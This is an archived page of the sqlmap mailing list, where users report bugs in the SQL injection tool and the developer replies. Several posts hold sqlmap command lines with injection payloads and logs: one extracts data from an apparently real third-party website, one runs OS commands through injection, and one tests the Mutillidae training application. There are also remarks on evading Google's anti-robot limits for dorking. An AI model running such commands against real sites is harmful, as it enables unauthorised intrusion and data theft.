sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Call for common table names

[Miroslav S. <mir...@gm...>]

...by 40 pages i meant 40 pages of search results

bye

On Sun, Oct 10, 2010 at 9:41 PM, Miroslav Stampar
<mir...@gm...> wrote:
> hi.
>
> what are the limitations they've noticed? maybe there is a limitation
> in number of search pages, but during last testing google returned
> something about 40 pages to work with which is more than enough.
>
> i just know that there are no limitations that common google search
> has in doing large number of search queries in some short time period.
> as I remember common google search nags about you may be a "robot",
> but i suppose that they didn't expect it for anyone to do it via
> mobile search page.
>
> plz, just send them that python script i've sent to you. let them try.
>
> kind regards.
>
> On Sun, Oct 10, 2010 at 9:33 PM, Andres Riancho
> <and...@gm...> wrote:
>> Miroslav,
>>
>>     Floyd Fuh and javier Andalia from the w3af dev team worked together to
>> implement a google mobile search wrapper and they noticed that it DOES have
>> limitations. Could you please confirm?
>>
>> Regards,
>> --
>> Andres Riancho
>>
>> El sep 30, 2010 9:32 a.m., "Miroslav Stampar" <mir...@gm...>
>> escribió:
>>
>> ok. thanks for noting. if i get time i'll also do this one. right now
>> results from plain google search seem to be more than enough.
>>
>> On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho
>>
>> <and...@gm...> wrote:
>>> The script is cool, but my idea was to use google.com/codesearch...
>>
>> --
>>
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Call for common table names

[Miroslav S. <mir...@gm...>]

hi.

what are the limitations they've noticed? maybe there is a limitation
in number of search pages, but during last testing google returned
something about 40 pages to work with which is more than enough.

i just know that there are no limitations that common google search
has in doing large number of search queries in some short time period.
as I remember common google search nags about you may be a "robot",
but i suppose that they didn't expect it for anyone to do it via
mobile search page.

plz, just send them that python script i've sent to you. let them try.

kind regards.

On Sun, Oct 10, 2010 at 9:33 PM, Andres Riancho
<and...@gm...> wrote:
> Miroslav,
>
>     Floyd Fuh and javier Andalia from the w3af dev team worked together to
> implement a google mobile search wrapper and they noticed that it DOES have
> limitations. Could you please confirm?
>
> Regards,
> --
> Andres Riancho
>
> El sep 30, 2010 9:32 a.m., "Miroslav Stampar" <mir...@gm...>
> escribió:
>
> ok. thanks for noting. if i get time i'll also do this one. right now
> results from plain google search seem to be more than enough.
>
> On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho
>
> <and...@gm...> wrote:
>> The script is cool, but my idea was to use google.com/codesearch...
>
> --
>
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
>
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Call for common table names

[Andres R. <and...@gm...>]

Miroslav,

    Floyd Fuh and javier Andalia from the w3af dev team worked together to
implement a google mobile search wrapper and they noticed that it DOES have
limitations. Could you please confirm?

Regards,
--
Andres Riancho

El sep 30, 2010 9:32 a.m., "Miroslav Stampar" <mir...@gm...>
escribió:

ok. thanks for noting. if i get time i'll also do this one. right now
results from plain google search seem to be more than enough.

On Thu, Sep 30, 2010 at 2:02 PM, Andres Riancho

<and...@gm...> wrote:
> The script is cool, but my idea was to use google.com/codesearch...
--

Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com

Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] double quote issue

[Miroslav S. <mir...@gm...>]

Hi.

Last few days there was some major refactoring regarding injection detection.

As I am human, and humans make mistakes, all of you who used v0.9-dev
version in last about 3-4 days you've probably had false NEGATIVES
with double quote type of injections. Sorry, and please update to have
it fixed.

Kind regards.

-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Retrieving weird characters from MySQL 4.0

[Miroslav S. <mir...@gm...>]

no, there isn't explanation :)

could you please send privately information about the site being
attacked. this way i have no idea why this happens. also, which sqlmap
version do you use?

kind regards.

On Sat, Oct 9, 2010 at 1:41 PM, Adri Kodde <adr...@ho...> wrote:
> Great project! Keep up the good work!
> I have one issue while communicating with a MySQL 4 database.
> Within the SQL shell I enter this query "SELECT 'foo'".
> After excecuting I get a list of weird characters, like: 'ۋ|'.
> Is there any explanation for getting these results?
>
> ------------------------------------------------------------------------------
> Beautiful is writing same markup. Internet Explorer 9 supports
> standards for HTML5, CSS3, SVG 1.1,  ECMAScript5, and DOM L2 & L3.
> Spend less time writing and  rewriting code and more time creating great
> experiences on the web. Be a part of the beta today.
> http://p.sf.net/sfu/beautyoftheweb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] Retrieving weird characters from MySQL 4.0

[Adri K. <adr...@ho...>]

Great project! Keep up the good work!
I have one issue while communicating with a MySQL 4 database.Within the SQL shell I enter this query "SELECT 'foo'".
After excecuting I get a list of weird characters, like: 'ۋ|'.
Is there any explanation for getting these results?
 		 	   		  

Re: [sqlmap-users] Sqlmap: DBMS Microsoft SQL Server 2005 --current-db ERROR

[Miroslav S. <mir...@gm...>]

also, i've tried your attack "vector" and couldn't find any results
with that site. is there any other way to retest it?

kr

On Sat, Oct 9, 2010 at 2:24 AM, Miroslav Stampar
<mir...@gm...> wrote:
> hi.
>
> could you please send me privately content of a file:
> /home/unkq/sqlmap/output/www.cssd.cz/session
> for further analysis.
>
> also, please retry your testing with usage of flag: --flush-session.
>
> kind regards.
>
> On Fri, Oct 8, 2010 at 7:42 PM, Pavel Saparov <sap...@gm...> wrote:
>> Hello there, I got another error with sqlmap-0.9dev:
>>
>> $ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a
>> "./txt/user-agents.txt" --current-db --threads 3
>>
>> [*] starting at: 19:21:53
>>
>> [19:21:53] [INFO] fetched random HTTP User-Agent header from file
>> './txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1)
>> Gecko/20060130 SeaMonkey/1.0
>> [19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as
>> session file
>> [19:21:53] [INFO] resuming match ratio '0.9' from session file
>> [19:21:53] [INFO] resuming injection point 'GET' from session file
>> [19:21:53] [INFO] resuming injection parameter 'slovo' from session file
>> [19:21:53] [INFO] resuming injection type 'stringdouble' from session file
>> [19:21:53] [INFO] resuming 2 number of parenthesis from session file
>> [19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from
>> session file
>> [19:21:53] [INFO] testing connection to the target url
>> [19:21:58] [INFO] testing for parenthesis on injectable parameter
>> [19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server
>>
>> web application technology: Apache
>> back-end DBMS: Microsoft SQL Server 2005
>> [19:21:58] [INFO] fetching current database
>> [19:21:58] [INFO] retrieving the length of query output
>> [19:21:58] [INFO] retrieved:
>> 816555554554444447411111114444455444444121445455444511111
>>
>> [19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the
>> command line and the following text and send by e-mail to
>> sql...@li.... The developer will fix it as soon as
>> possible:
>> sqlmap version: 0.9-dev
>> Python version: 2.6.4
>> Operating system: posix
>> Traceback (most recent call last):
>>   File "sqlmap.py", line 96, in main
>>     start()
>>   File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start
>>     action()
>>   File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action
>>     conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
>>   File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in
>> getCurrentDb
>>     kb.data.currentDb = inject.getValue(query)
>>   File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue
>>     value = __goInferenceProxy(expression, fromUser, expected, batch,
>> resumeValue, unpack, charsetType, firstChar, lastChar)
>>   File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in
>> __goInferenceProxy
>>     output = resume(expression, payload)
>>   File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume
>>     if len(resumedValue) == int(length):
>> ValueError: invalid literal for int() with base 10:
>> '816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211'
>>
>> [*] shutting down at: 19:31:43
>>
>> ------------------------------------------------------------------------------
>> Beautiful is writing same markup. Internet Explorer 9 supports
>> standards for HTML5, CSS3, SVG 1.1,  ECMAScript5, and DOM L2 & L3.
>> Spend less time writing and  rewriting code and more time creating great
>> experiences on the web. Be a part of the beta today.
>> http://p.sf.net/sfu/beautyoftheweb
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

Re: [sqlmap-users] Sqlmap: DBMS Microsoft SQL Server 2005 --current-db ERROR

[Miroslav S. <mir...@gm...>]

hi.

could you please send me privately content of a file:
/home/unkq/sqlmap/output/www.cssd.cz/session
for further analysis.

also, please retry your testing with usage of flag: --flush-session.

kind regards.

On Fri, Oct 8, 2010 at 7:42 PM, Pavel Saparov <sap...@gm...> wrote:
> Hello there, I got another error with sqlmap-0.9dev:
>
> $ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a
> "./txt/user-agents.txt" --current-db --threads 3
>
> [*] starting at: 19:21:53
>
> [19:21:53] [INFO] fetched random HTTP User-Agent header from file
> './txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1)
> Gecko/20060130 SeaMonkey/1.0
> [19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as
> session file
> [19:21:53] [INFO] resuming match ratio '0.9' from session file
> [19:21:53] [INFO] resuming injection point 'GET' from session file
> [19:21:53] [INFO] resuming injection parameter 'slovo' from session file
> [19:21:53] [INFO] resuming injection type 'stringdouble' from session file
> [19:21:53] [INFO] resuming 2 number of parenthesis from session file
> [19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from
> session file
> [19:21:53] [INFO] testing connection to the target url
> [19:21:58] [INFO] testing for parenthesis on injectable parameter
> [19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server
>
> web application technology: Apache
> back-end DBMS: Microsoft SQL Server 2005
> [19:21:58] [INFO] fetching current database
> [19:21:58] [INFO] retrieving the length of query output
> [19:21:58] [INFO] retrieved:
> 816555554554444447411111114444455444444121445455444511111
>
> [19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.9-dev
> Python version: 2.6.4
> Operating system: posix
> Traceback (most recent call last):
>   File "sqlmap.py", line 96, in main
>     start()
>   File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start
>     action()
>   File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action
>     conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
>   File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in
> getCurrentDb
>     kb.data.currentDb = inject.getValue(query)
>   File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue
>     value = __goInferenceProxy(expression, fromUser, expected, batch,
> resumeValue, unpack, charsetType, firstChar, lastChar)
>   File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in
> __goInferenceProxy
>     output = resume(expression, payload)
>   File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume
>     if len(resumedValue) == int(length):
> ValueError: invalid literal for int() with base 10:
> '816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211'
>
> [*] shutting down at: 19:31:43
>
> ------------------------------------------------------------------------------
> Beautiful is writing same markup. Internet Explorer 9 supports
> standards for HTML5, CSS3, SVG 1.1,  ECMAScript5, and DOM L2 & L3.
> Spend less time writing and  rewriting code and more time creating great
> experiences on the web. Be a part of the beta today.
> http://p.sf.net/sfu/beautyoftheweb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] Sqlmap: DBMS Microsoft SQL Server 2005 --current-db ERROR

[Pavel S. <sap...@gm...>]

Hello there, I got another error with sqlmap-0.9dev:

$ python sqlmap.py -u "http://www.cssd.cz/vyhledat/?slovo=hledat" -v 1 -a
"./txt/user-agents.txt" --current-db --threads 3

[*] starting at: 19:21:53

[19:21:53] [INFO] fetched random HTTP User-Agent header from file
'./txt/user-agents.txt': Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1)
Gecko/20060130 SeaMonkey/1.0
[19:21:53] [INFO] using '/home/unkq/sqlmap/output/www.cssd.cz/session' as
session file
[19:21:53] [INFO] resuming match ratio '0.9' from session file
[19:21:53] [INFO] resuming injection point 'GET' from session file
[19:21:53] [INFO] resuming injection parameter 'slovo' from session file
[19:21:53] [INFO] resuming injection type 'stringdouble' from session file
[19:21:53] [INFO] resuming 2 number of parenthesis from session file
[19:21:53] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from
session file
[19:21:53] [INFO] testing connection to the target url
[19:21:58] [INFO] testing for parenthesis on injectable parameter
[19:21:58] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Apache
back-end DBMS: Microsoft SQL Server 2005
[19:21:58] [INFO] fetching current database
[19:21:58] [INFO] retrieving the length of query output
[19:21:58] [INFO] retrieved:
816555554554444447411111114444455444444121445455444511111

[19:31:43] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon as
possible:
sqlmap version: 0.9-dev
Python version: 2.6.4
Operating system: posix
Traceback (most recent call last):
  File "sqlmap.py", line 96, in main
    start()
  File "/home/unkq/sqlmap/lib/controller/controller.py", line 281, in start
    action()
  File "/home/unkq/sqlmap/lib/controller/action.py", line 89, in action
    conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
  File "/home/unkq/sqlmap/plugins/generic/enumeration.py", line 131, in
getCurrentDb
    kb.data.currentDb = inject.getValue(query)
  File "/home/unkq/sqlmap/lib/request/inject.py", line 374, in getValue
    value = __goInferenceProxy(expression, fromUser, expected, batch,
resumeValue, unpack, charsetType, firstChar, lastChar)
  File "/home/unkq/sqlmap/lib/request/inject.py", line 120, in
__goInferenceProxy
    output = resume(expression, payload)
  File "/home/unkq/sqlmap/lib/utils/resume.py", line 164, in resume
    if len(resumedValue) == int(length):
ValueError: invalid literal for int() with base 10:
'816555554554444447411\x02111114444455444444\x02\x021\x02214454554445111\x0211'

[*] shutting down at: 19:31:43

Re: [sqlmap-users] "parameter is not dynamic" / "all parameters are not injectable" error

[Miroslav S. <mir...@gm...>]

this was fun to test :)

you've used info: user_name=test&password=1234 while you haven't made
that account in Mutillidae (that link Register on Login page).

problem goes like this. sqlmap tests some sql expression for being
TRUE when testing one of sql injection vectors (like that: "testing
unescaped numeric injection on POST parameter 'password'"), while it
also has a double check vector which is of the same kind but it must
return FALSE.

while sqlmap is AND based, and in your case both checks for all
vectors returned FALSE ("Bad user name or password!"), sqlmap is not
able to properly detect sql injection existence.

this could be a good test case for implementing OR based sql injection
support too, for cases like this one.

kind regards.

On Tue, Oct 5, 2010 at 3:45 PM, ts2112 <ts...@go...> wrote:
> Hi!
>
> I used the publicly available mutillidae test application to test sqlmap.
> Whatever I do I get the response "all parameters are not injectable"
> although this is definitely not the case, as a burp trace shows. Example:
>
> ===== Command:
>
> $ ./sqlmap.py -u "http://was.sntest.sn/mutillidae/index.php?page=login.php"
> --data="user_name=test&password=1234&Submit
> _button=Submit" --method=POST -v 0 --tables --flush-session -p password
> --proxy "http://localhost:15000"
>
> ===== Result 0.9 (similar with 0.8):
>
>>>>>
>    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>    http://sqlmap.sourceforge.net
>
> [*] starting at: 15:26:01
>
> [15:26:05] [CRITICAL] all parameters are not injectable
>
> [*] shutting down at: 15:26:05
> <<<<
>
> ===== Among the 38 requests, that burp show, are these 2
>
>>>>>
> 1. Request
> --------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <headers>
> user_name=test&password=1234%29%29%29%20AND%20%28%28%283304=3305&Submit_butt
> on=Submit
>
> 1. Response (no SQL-Injection evidence)
> --------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4
> mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28
> mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 5091
> Connection: close
> Content-Type: text/html
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
> <html>
> <head>
>  <meta content="text/html; charset=us-ascii" http-equiv="content-type">
>        <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
> </head>
> <body>
> <table border="0" width="100%" cellspacing="0" cellpadding="0">
>        <tr><td bgcolor="#88ff88"align="center" colspan="2">
>                <table width="100%">
>                <td valign="top"><a href="index.php"><img border="0"
> align="top" src="images/coykillericon.png"></a><br>Version 1.3</td>
>                <td align="center" valign="top"><h1><b>Mutillidae: Hack,
> Learn, Secure, Have Fun!!!</b></h1>
>                <font color="#ff0000">Not logged in</font>
> ...
>
> 2. Request
> ------------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <Headers>
> user_name=test&password=1234%27%29%29%29%20AND%20%28%28%28%27xUjr%27=%27xUjr
> &Submit_button=Submit
>
> 2. Response (evidence of SQL-Injection)
> ------------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4
> mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28
> mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 359
> Connection: close
> Content-Type: text/html
>
> Did you <a href="setupreset.php">setup/reset the DB</a>? <p><b>SQL
> Error:</b>You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> '))) AND ((('xUjr'='xUjr'' at line 1<p><b>SQL Statement:</b>SELECT * FROM
> accounts WHERE username='test' AND password='1234'))) AND ((('xUjr'='xUjr'
> <<<<
>
> To my understanding, by the difference of those responses and the pattern in
> the second sqlmap should recognize that there *is* an SQL Injection.
>
> Thank you!
>
> Thomas
>
>
>
> ------------------------------------------------------------------------------
> Beautiful is writing same markup. Internet Explorer 9 supports
> standards for HTML5, CSS3, SVG 1.1,  ECMAScript5, and DOM L2 & L3.
> Spend less time writing and  rewriting code and more time creating great
> experiences on the web. Be a part of the beta today.
> http://p.sf.net/sfu/beautyoftheweb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] "parameter is not dynamic" / "all parameters are not injectable" error

[ts2112 <ts...@go...>]

Hi!

I used the publicly available mutillidae test application to test sqlmap.
Whatever I do I get the response "all parameters are not injectable"
although this is definitely not the case, as a burp trace shows. Example:

===== Command:

$ ./sqlmap.py -u "http://was.sntest.sn/mutillidae/index.php?page=login.php"
--data="user_name=test&password=1234&Submit
_button=Submit" --method=POST -v 0 --tables --flush-session -p password
--proxy "http://localhost:15000"

===== Result 0.9 (similar with 0.8):

>>>>
    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 15:26:01

[15:26:05] [CRITICAL] all parameters are not injectable

[*] shutting down at: 15:26:05
<<<<

===== Among the 38 requests, that burp show, are these 2

>>>>
1. Request 
--------------
POST /mutillidae/index.php?page=login.php HTTP/1.1
... <headers>
user_name=test&password=1234%29%29%29%20AND%20%28%28%283304=3305&Submit_butt
on=Submit

1. Response (no SQL-Injection evidence)
--------------
HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 13:26:04 GMT
Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4
mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28
mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.3.0
Content-Length: 5091
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
  <meta content="text/html; charset=us-ascii" http-equiv="content-type">
	<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" /> 
</head>
<body>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
	<tr><td bgcolor="#88ff88"align="center" colspan="2">
		<table width="100%">
		<td valign="top"><a href="index.php"><img border="0"
align="top" src="images/coykillericon.png"></a><br>Version 1.3</td>
		<td align="center" valign="top"><h1><b>Mutillidae: Hack,
Learn, Secure, Have Fun!!!</b></h1>
		<font color="#ff0000">Not logged in</font>
...

2. Request 
------------------
POST /mutillidae/index.php?page=login.php HTTP/1.1
... <Headers>
user_name=test&password=1234%27%29%29%29%20AND%20%28%28%28%27xUjr%27=%27xUjr
&Submit_button=Submit

2. Response (evidence of SQL-Injection)
------------------
HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 13:26:04 GMT
Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4
mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28
mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.3.0
Content-Length: 359
Connection: close
Content-Type: text/html

Did you <a href="setupreset.php">setup/reset the DB</a>? <p><b>SQL
Error:</b>You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'))) AND ((('xUjr'='xUjr'' at line 1<p><b>SQL Statement:</b>SELECT * FROM
accounts WHERE username='test' AND password='1234'))) AND ((('xUjr'='xUjr'
<<<<

To my understanding, by the difference of those responses and the pattern in
the second sqlmap should recognize that there *is* an SQL Injection. 

Thank you!

Thomas

Re: [sqlmap-users] Error while excecuting os-cmd in sqlmap 0.9

[prashant j. <pra...@gm...>]

it wrk
thnks

On Thu, Sep 30, 2010 at 11:00 PM, prashant jadhav <
pra...@gm...> wrote:

> hi ,
>  While testing the --os-cmd=ls in sqlmap 0.9 dev  i m getting the following
> error
>
>
> Please advice
> The details are
>
> URL = sudo python ./sqlmap.py -u "http://xxx/bbb.php?article_id=2322"
> --os-cmd=ls -v 1
>
>
> "
> [23:06:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, please copy
> the command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.9-dev
> Python version: 2.5.2
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line
> 280, in start
>     action()
>   File "/pentest/database/sqlmap-dev/lib/controller/action.py", line 152,
> in action
>     conf.dbmsHandler.osCmd()
>   File "/pentest/database/sqlmap-dev/plugins/generic/takeover.py", line 66,
> in osCmd
>     self.initEnv(web=web)
>   File "/pentest/database/sqlmap-dev/lib/takeover/abstraction.py", line
> 154, in initEnv
>     self.webInit()
>   File "/pentest/database/sqlmap-dev/lib/takeover/web.py", line 198, in
> webInit
>     uplPage, _  = Request.getPage(url=self.webUploaderUrl, direct=True,
> raise404=False)
>   File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 174, in
> getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen
>     return _opener.open(url, data)
>   File "/usr/lib/python2.5/urllib2.py", line 381, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.5/urllib2.py", line 399, in _open
>     '_open', req)
>   File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open
>     h = http_class(host) # will parse host:port
>   File "/usr/lib/python2.5/httplib.py", line 639, in __init__
>     self._set_hostport(host, port)
>   File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80jpma'
>
> [*] shutting down at: 23:06:37
> "
>

Re: [sqlmap-users] Google search ('dork') bug in sqlmap?

[Miroslav S. <mir...@gm...>]

thanks. you are absolutely right. i've done the necessary changes.
thanks for report. check out the latest version from our SVN
repository to have it fixed.

kind regards.

On Fri, Oct 1, 2010 at 7:03 AM, Brandon E. <bra...@gm...> wrote:
> When using the Google 'dork' feature (-g option) in the latest development
> version of sqlmap (and what I can only assume would be all previous
> versions), it appears that when Google returns results it encodes HTML
> entities like the ampersand "&" with &amp;. sqlmap does not do anything with
> these encoded entities and results in improperly named variables/parameters
> being checked.
>
> Observe the following output:
>
> [23:50:28] [WARNING] GET parameter 'amp;s' is not dynamic
> [23:50:28] [INFO] testing if GET parameter 'amp;id' is dynamic
> [23:50:29] [WARNING] GET parameter 'amp;id' is not dynamic
> [23:50:29] [INFO] testing if GET parameter 'amp;Name' is dynamic
>
> As "&amp;" isn't converted to "&" prior to the disassembly of the URL for
> testing, sqlmap is under the impression that variable names are different
> than what they should be, and the wrong variables get tested.
>
> I have written a one-line patch to remedy this. In lib/utils/google.py, line
> 74 adds the target URL. Prior to the targetUrls.add() statement, place the
> following:
> match = match.replace("&amp;", "&")
>
> This results in the for match .. block that the statements are contained in
> resembling:
>
>         for match in self.__matches:
>             if re.search("(.*?)\?(.+)", match, re.I):
>                 match = match.replace("&amp;", "&")
>                 kb.targetUrls.add(( match, None, None, None ))
>
>
> If I am wrong and the right variables are being tested (but not properly
> displayed in the verbose output), please let me know. Otherwise this patch
> should be committed to the codebase in order to remedy this Google search
> results issue.
>
> - Brandon
>
>
> ------------------------------------------------------------------------------
> Start uncovering the many advantages of virtual appliances
> and start using them to simplify application deployment and
> accelerate your shift to cloud computing.
> http://p.sf.net/sfu/novell-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia

[sqlmap-users] Google search ('dork') bug in sqlmap?

[Brandon E. <bra...@gm...>]

When using the Google 'dork' feature (-g option) in the latest development
version of sqlmap (and what I can only assume would be all previous
versions), it appears that when Google returns results it encodes HTML
entities like the ampersand "&" with &. sqlmap does not do anything with
these encoded entities and results in improperly named variables/parameters
being checked.

Observe the following output:

[23:50:28] [WARNING] GET parameter 'amp;s' is not dynamic
[23:50:28] [INFO] testing if GET parameter 'amp;id' is dynamic
[23:50:29] [WARNING] GET parameter 'amp;id' is not dynamic
[23:50:29] [INFO] testing if GET parameter 'amp;Name' is dynamic

As "&" isn't converted to "&" prior to the disassembly of the URL for
testing, sqlmap is under the impression that variable names are different
than what they should be, and the wrong variables get tested.

I have written a one-line patch to remedy this. In lib/utils/google.py, line
74 adds the target URL. Prior to the targetUrls.add() statement, place the
following:
match = match.replace("&", "&")

This results in the for match .. block that the statements are contained in
resembling:

        for match in self.__matches:
            if re.search("(.*?)\?(.+)", match, re.I):
                match = match.replace("&", "&")
                kb.targetUrls.add(( match, None, None, None ))


If I am wrong and the right variables are being tested (but not properly
displayed in the verbose output), please let me know. Otherwise this patch
should be committed to the codebase in order to remedy this Google search
results issue.

- Brandon

Re: [sqlmap-users] Error while excecuting os-cmd in sqlmap 0.9

[Miroslav S. <mir...@gm...>]

i think i've found it. please try with the updated version from SVN repository.

